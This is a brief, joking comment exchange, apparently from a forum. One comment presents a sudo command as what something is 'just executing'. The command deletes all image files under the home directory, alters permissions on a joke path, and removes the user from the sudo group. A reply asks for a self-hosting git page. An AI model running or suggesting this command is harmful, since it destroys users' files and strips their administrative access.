Don’t worry, it’s just executing
sudo find ~ -type f ( -iname “.jpg" -o -iname ".jpeg” -o -iname “.png" -o -iname ".gif” -o -iname “.bmp" -o -iname ".tiff” -o -iname “*.webp” ) -delete && sudo setfacl -m u:$USER:— /usr/bin/sex && sudo gpasswd -d $USER sudo










Okay, but where is the git page to self-host it?